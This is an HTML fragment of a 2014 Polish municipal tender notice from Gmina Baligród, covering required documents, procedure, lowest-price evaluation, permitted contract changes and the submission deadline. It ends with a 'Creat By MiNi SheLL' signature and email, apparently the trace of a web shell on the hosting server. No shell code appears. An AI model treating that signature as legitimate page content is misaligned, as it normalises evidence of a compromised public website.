<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia wadium, pełnomocnictwo - jeśli dotyczy, pisemne zobowiązanie podmiotu trzeciego - jeśli dotyczy, Formularz ofertowy, Oświadczenie o spełnieniu warunków udziału w postepowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy:
a)	Zmiany danych teleadresowych, zmiana konta bankowego, osób reprezentujących firmę przedstawionych w umowie - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody.
b)	Zmiany stawki podatku VAT. Zamawiający dopuszcza zmianę wynagrodzenia brutto w przypadku zmiany stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.baligrod.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Baligród, 
Pl. Wolności 13, 
38-606 Baligród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 10:00, miejsce: Gmina Baligród, 
Pl. Wolności 13, 
38-606 Baligród 
Sekretariat, piętro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com